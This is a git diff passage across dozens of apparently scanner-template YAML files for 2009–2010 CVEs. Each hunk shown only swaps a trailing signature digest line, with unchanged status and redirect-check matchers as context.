a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 6a37505923..149a2cef9e 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022068543e60fc4facb4ccb5230d20cb0fa0a00abd6aa8fd5cf39b2529b7bb873ab50221008d2e4150704b669cbecc7ce7f49bfbec1ba472cb3366c0f5f130470595a83ade:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f65fd144117d7bfbd045622fd6288dcc5e8c2168ca78345ded078d84fd4ad0702200fe5676f980b10028a3883388c86a2505a89ccd807124b7a4fd9911e435f024b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 2d0c7f2bc6..f8f483412b 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205c85503bda607845a28b239f2f365f4529e4c04cf49a70492896024611cf3761022100ae26630b7fc4b3b4ac05af246c4efe22a86adef659fae19850bae207bc182df5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e20de1d4fa4b8d79cd625fb22598bc6890b57827e3c90c9f255fa70df586dbe7022100bf81f387ef706cccb336ac295f22d2da08f8579a47997d264257c038e1625ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 0bacfc0c2c..d369503dff 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100de0d85bd97de7af12b9af594e12a4e2e69af5663da0f3bb776b9765f67da288f022100bc4fef0c76f0851ec1cb7c7244c44574e524bfdee89ae6ad3a7ee9b7a24ad253:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e58cdda23321bd4f90508e6ae4c30fd1edfc6dc518ced1e73daad6c68374f12302206e53766b2a38b2e450a79c7deebb4a321c4a59b7ad930a086b2c055e202af8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 7fe7d755f0..877a78fbf2 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206536dbb03ff052a363a8bb1a27c9f617b7b0d2ac0d3b93576899b0c6917cd7f9022100ee16eb5f362a6a74281f1a7c3c2b52ad3952aa423b472f7675148ee235f11ed4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210093d81e795673f5fdd2793e44396c63adf75427c6b98d4dd122398521270163d6022023e83928ef6fbd265a169733eba4cc7c3b89f8c86bdb168756f36192bc20712a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 5724e7b037..0e59db9a48 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203ca9e6616dbf5792ef73b973153c924b0d82b3e931d8fbf0e730e1de78666fec0220409d6863e8116c0abf023950081eec3f3ac2b3faed7c33701121f0072da97c8d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f5e83b795b896e98c1295d7d8b4e1515a1e7c1a638ca243155f1d0ac680e28ba022038fa938c6eaba753503d842cb95f4ee9535ea18b4f9a907de4b153a64d827eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 69e4cb61c7..d85968a008 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009194f7f20d6b2b9a4f05ee6ed37e01443c713e46cc08b72aecacda56fc1c29210221009a4ba231e38c132608cabd17ba8784ccbd01108cc521bb5d58805f1c7911a262:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207807e92c7db0ec48e102b8b6b1028701865a3f29fe1b561b9323b7c2041ded000220453985bfe0658ddd58b3a99843efdd958a274cfd29a6ab87d08bc3d2f4a6637b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 45a49a0ed8..c71296230d 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4a0a00473045022100e2ff72616dd772779552d252be606a8d4995ce91d1bf943c1b9dcc8d870540fd02202002cab44c0f3f9e0485ec51fc0c94163d869846a7fb8fa57cee48437d1343d9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f76222ea7d3f58d06a9854a7f1abc9310c00b8171bd7f53125c5f4b468033eeb022100d1a7bd003526312fd1533325b9bab5c4ea82c13091a5eab5241f7baed03d689f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 3a181d6e0c..dfc830c8b7 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100efc9a19441ff1e01dd899e2623c478e7b349cb0754b0bb88da8f2cf9e0f9fddc0221008db344560c32476a8ab53278753ff6f5095671c3afff0bd2849293c7f630e39f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cef72bbae06856fd615ba4450c619a701dfd20272d017ab492dc2371ffca08e5022100e93079aaa718e3bb523439713f5e1e34f2280357f8e7454ffd2a8db45a14742f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index a1f5828421..906cd428e4 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204e50dadeea60fab80521b5856d4a9a76d389e3227b045ea06e176bc8941e1fff022056df49279b99914765e4314c59335ceada817318b06191b7b511b9321e5cf976:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207de85059f9ab58dffd2da988d35d6ad69e11af10380328c5d5160a161732886d022073a2dc6fc2f622dd8c9cd03e76085f591fbe4794253e7b6dec7aba8876ae3a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 37df0a64ab..a1d97fa0e0 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022067f075ba27437d82eab7b5ef158b4d52a4132877e2cbbf4cd081f1afc6671baf022100d046ce930a94c152b4ed7562be8dd9964e95ce9c5c648a4cee58108c36169e75:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220661cc9b6a38b4644bae70de3bcfd611e0fe6bdb9cb61c5fb67b484194d229edc022100bbbdc7cdf62d978d340a7e18c9fd64ad3c5f4072b9313a5809a07c783a7565b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index dd9434713b..5d4ccf8008 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ab56f6047c7b9bd11ea24cf26b256d07038a4a29580c3a48ad26e7b106893333022100b20cc596aa243c544d45c1c315cdccba8d896dfaeb22f73bb2dfac6c69707d7b:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220795e72eee680449f83c414e6209960563bce0e6a391f2e8657932a0453b261bb0220129dfbca6527fa6d1e9b05aa3b95cd16f56eea7aec416607f73fe23271b11f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 8ba4aeeef0..1398c27f30 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009f82d29d04e30aa66bfaabc7e2e42b06f972f9ed73c909e0bf169f141cc0726c02201b396898a24db3b07285628139b48bad19f8327a47e7b1468a6c009c14d4798c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210089dc9a51841d681725df074f72359b8c250a5bdb1e05349f9c802997ec75ddde0220671ea7385952d5965ea47b4d7551f4cb2baec6be257e32a6daffbf8fd5c97cc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 6812faa9eb..c57c44103f 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204a24673f56aa5c85ff48724f63012acea7d3382efe57ca0634ec7c36054b769a0220084b2486877c720086805f01de57b457dda29fe6b21f566e6f301ddd9b1f7f9f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fbdf7ab43f17bff19a9f6dd3b761c500fe1000cc443fe88d4bba236cfc387a6c0221008e09c85f7038d863defdcaaee2b2b6403ede8367ac22c1db00bc8f44d91ff48c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 50b934ac5f..93ba39e93d 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203b428f2d632d594f674fea04e8a99bb1950cedf35200782d84dcca2917913afe0220256e2fdb392f182755558229ac57469b31bee192c7b07f63c5d2572f6d5e45cb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203b3d364f7de3e64b369235acca98d8d5c1752c5b62c2b2429312b8210296374e022044e5b3f88f11b3de0af1bf127807ddf82bb1374c58434c62b0170c8240ba9a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 0b54b6c5de..a5d05e107e 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d28929c969fa1f34d40f6ee1c70b0502772a956f347081368ff463ce5d570d85022100b109747ce42bc73f4d3313dca4414fc3d484f1e38e6d57a8b08789e70f8e7f23:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210090c6bea75a8c86c1ffa7c757ca85b0d11cd23ffe34e969783639f2f03e4a6c3002200bf8de1b110a21ab477a5a1b3a2cd3b976aa492d8e13382be4a30ba7333e18a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 41bebf3648..1e011df71b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204e4b197df62891adb6c8e870aa1c97cbca74cc9a8165319a8ba0e2080ab491c002210084079964a1109bbaef51e29333221d6e36cd7e3dad60a602d238d54f74b39c1e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022033d51aa8d66efbab6ac909e460e51282dfeadc2ee26b8d80b0d96ad37fff6e4e02200d14cec9fbf93f1798f605c4628d38067d64d8098225a0fb132684bd3b8b3030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 85d7ff9f15..76413c948c 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cbfc6f184eb1a4f0115dff7cffbb5018f530c02cc260e340d73176a7f3668f650220292e1eeb29585fef8f580f5aaf90d4c96d2d9cd237108b57732b1f66a43a327e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037b36cef235c288d7f97d285fc98a14d25e926a1efb8fea1772d2e2f2c77a4fd022100975a8f0a46aa6d4069b76789145ebd15605dc80798ccf8629d493da56a68a327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 7beb57d947..5623cba4b0 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e3c051116066926152d776ec9deb55581bc4a7afe92b92909142fa50692e6fef022059817440f94ad60f8c058adbaa689541520273bced8088b45ada0c31d8ec4a99:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220759610b3cfa58d8931979430f7a4a9ada94ee3a9d5be1d40ba9d8c2da061188a022100b18cea9ed83cfe15755fcaee23f1e60552c3f362f7c87b558e8eb09ad653b9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index fefa726ec5..1a988dc96e 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203f91a611acec7b76b8b694381bcc008f277c2db6ed4daa778ac2b15ea34edd8f0220134ab12d7b3a7a29d0bc10d686d900349f10a196560a9a9c49a7168bddcc2f0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100815556a4ebbfa030200fe350064ae2c0c966df72e57329bcd5db301ce6c4fba602207e85ff07ca3118905c23069c2a2e2d57ea4b4e5b5de1c9f5dc7e76d92cc21cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index da6bbd4cb8..4fd8ea1be5 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201109720fce23f8c11f67b2af17f59c70ca5f49529b91879e96e61d34f9950c9d022100b245643db82094faaf69edcc0bddde30e3f8857db8d1a50a7d2a08107d22f93f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022074e85ddbf26d64023ab55a2789590ec6564e1c216495d2c457dbb0e0681c6061022055e23fd4016556867629901d070254eea9e37ec45d46ec91ac725a17e5cf1f7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 8497329614..46411bb4dc 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200cc252f65e51a36f610deb94498d3c7bccefb686f9d63d5ca0cc77f3ea735b26022100b5500ce85603b99ba0a867fe70a2e481b3dfe67dabc68ef9510705d2a90cb867:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220794bcf231881650e317f88fa4974445e152e90eeaeb3c7d1335a8ea8cc22a96e02207d908234214e05e896c5b6354e53a82c9af6b3a3a157d6ca88cd035c6c751052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d863a2512b..a8d9aa9f99 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ffe5a3472c42c1808ab2bd5770ea5c20e0cb762a00e7e1de25410af4ed072df902201cc7490ca8126c51336795f3b2f0d60adedd66fd8bd9e4504e676cee8fe359ff:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203551a9d1554399199395bc25a12ef725dc5415ea2c64f7d9ecab874879adb7f002204bba7063a4149556bbd33ebe8c89b0bdd2e2fde3036a81ed5f37d789b827619d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index e4d132a022..38cbba2dac 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f831d1ea90360e9566951b1a42ab34baef4bb0606d9ba2425e26c0c7ecec84ca022100b4299171ddd5b51c7f940affb21005fcf8a7c9de1493a0d7bfc844744651460d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008adfa09bdeda7116f077d91bfaa1663834bc11b659221cca85aef7b879b1b412022100fc2e3d45808b27091dbd45dd999fb91e67ed75a6ec1b7cfc15a26e25b69f2b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 6bc0d2f3f2..9b87a67037 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e05d000cd8e834f80113fabc3ee384fa194dcbbbecb38db03e4b59241fe5bdae022100d5063ab436e2de361163f562e5b4ac64c28a80ffc11f9917e8cbe62a2383716f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022040d1a26acbb5f54e6e8f2ffe550d201d237d8cec6a257c3b30f666529bd72007022100c5abc9dc4fa0e673a46964a87aae0f16a2f3f411b4464663260ba2e01552fc77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 648b9cc8cd..6973d91ed2 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100971d3f14a84bbe7394416675c1c1c00fe81ec7bb290ff12bc9d5e68c3e93ff990220121aedfea56f32deae79988e58bb573c9ce104329ac5fabba5ea6d885b2ef48f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205564d609e9e5e77b3ad7e5696c5e4df35463f146e1e1a6d8e8cee41594513bc20221009c9b3612f79816349cb1c67eae94675cfc7ca529e43feee2ec3cad2fa0bc652f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 990ba77c85..c578b584fd 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220361b8f46edc3d59e8571c457996c0e46a5e5c56857d7f971fdd3abc2c03263de02200c4650a4cf4833be009212b7fbb5fe2e26ac15fd233132ff343447e60d8bd36b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cac0c345c752c0ecc88ebbc22fdb2d47b16b6cc0855ad855a16768947001783502207ba9207f5136899b5ba03a261243c1323764970aba955c501ee2799c0a4620e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index a02283527a..3f4dfffdd2 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e5ebaeed2bac266bb34d7bfc54db49c3b57bb448a4492b8d14e332f923b351d6022100d0865fbba6ab8fe30a6386ca7c79690f1c739d502bfefc6cf08bfbe843719df3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f239144788a883e7b5601236d930e6c38a04211a113d54e39dedf2e4c01177bd02204bd1d48709a290e60a73a51981c2bc3e24ea9577ed732f4e7a3643de8b3328ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index f5b7502be6..bcec0a39ab 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008c2d9d6c1d0fa510f1c371ca7397f0522d890bf7ed44bfb73c5a254c17b35031022058d2d7bc3d1c631fee37b39d62937b3050f6ebb6f884ad001a891513ae83badc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009b7249ff304172aeb945c7d08494911702e3be0041ab2845f0b353761c07a90f022100df1c961a32aad948b308b373cb0c3edb869706e828ffdb69b5b52b99163b8df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 98f273bd2f..800b4842ea 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207c9eeb4dd64b971fab9d3941f10d8b0352f0a8f947dbd151fb8662e69f02cd460220195d1871732a802799f5f513de99d4439bf6b805091a8d05e9d0fd011bb02731:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220312fc361134f34780714ab7caccb38894735881a2e3643855fcce4005c128edb022100f84a1e6a920e469c3ee8be35f15364ae8bf5c3461ed445721440abb55490c8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 91c73d06e9..877469ac85 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e119dc09015398c25889598cfdfde8d92bc042ad33dcbae6145f81d6b1889c41022100eee3202502ae5f3e171a65ae426e4a50e24ec663997da4bd8a04d8a02e725828:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e08a1df5c1711f8c2de7319da2a7887fb6086e2aaf74042984a6dad0a3b35413022100d29af289968fc22e03b8256c91f23730cdbbc2182e3b18ad63f48afef53de381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 8b76dc626e..5c6c673454 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a9c62f4f123e4a76216b002088e7fee532676b3f5500b2dbae96f4b489cc0024022030e1aad84c65aa89798c42d8fdb260530582c49bf57ed5ccad01dc09d534340d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a822bbfecb35550f97996a4120d3b877f14c207b263b5d4b47e3e46c381fef27022100ace34d30f5af53a5be13fdca0a91717e619340329fadf870a1eaef0f326c301a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 76560a2b8f..cfd65fd547 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206eca475da1f365912bccfbf6ad65fe6016e4a4f6b108b4a05af2f5b0c3f488fc0221008e7e5df014034a477aafbca3a1bff697fcd016561d90231930c972cd183c1c83:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f3853b09bca3be7f7d2b638761b33c2603562202261a599a3861a1760a514f4602207b8768e2a5d2a7f28f72a7ec7386a48fbb98fc70801bff8d4c5db6a062cd4374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index fbd38c252b..e8898bcf2f 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008e0ee62f356399e9271e1a02299fff568f24f1e4be6cf22773f5d10cfef301cb022050534753e23af6627498da820d9d80ec97228da13e84307e2a1a36d88312ecdb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ebfb35ecb36e66a87b3b3cd096403dc499d3059b7f37bc351bbc3e5600aba1c5022100b3d38405c2f6cfe7e3bd0b6dae35cce321f70ee487a9a55f514bb87be3492e03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index b915fb918a..62caac37a0 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022045fb60d254195a8539ca3898ea3c42f4ae26f7ec20b7bc1f1e2ddee773b33e62022100860b5a3cf088318a9b4106f3db310adaafa529886aa91e011c2fa18da2179b0c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c7a6823d1ae16ae4cb3d4191137afdf7a111e448b054ff7ed7488399e623172402210084e7a1c9c309a731879bda0ba3684a3030924e1026c567cbd7fe5e728ceb0b93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index ed7ee71d95..3bf411c7b7 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100db2781144213601f53bc66f280cecdb0dcc60561254655b31b4fdb46060149bf022100a1a1a3b0233c39e198ac8d5362ba55173586e83da6e287ed4415d3d292cd584e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d11c8895c930bd0c061905197392ce20fd3d46711d5bbc07d01292f3a02fe648022100d1ade5c83f62afeace83e387e735ad28a4792a7f859ad24b2f7a67ea9886710c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index ed1cfed08e..b82919f1b9 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022019a6216a17aa46b463344db67611da4a018991db32794367e30170fda4c032d5022100fee05d56fadf7730ae13dcc8c24e28d2b65d732e2551966484f17d1a0c59b8a5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210099570412a511f9fab06938d52b96e727b8a2ac72189cf4a40c7de6347637efe1022100f38ac18edb2a4782e58189588c4e93e08427dc21a51199d9d818de47b173dc0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index ecbdb71cc8..1f360cb1f8 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022071e5c6089d7a3265656928d4b0844e7ac30e0c8858f384969e8ea28445e9a1a802201afbcf554b1791a2d1682068b06013d1aff32dd2a44d16d76f2406f622e632f8:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022069da4192cfee9f394d79bdacfcd2ca6e1b017f8c2a9ea851e6fc6c6d7a0c838002202d8afda34f1856c23f8bbbc793fa9e6adeb0ba5f5cb24184662059e6a9ed4361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 6152e01642..02831bd1c8 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 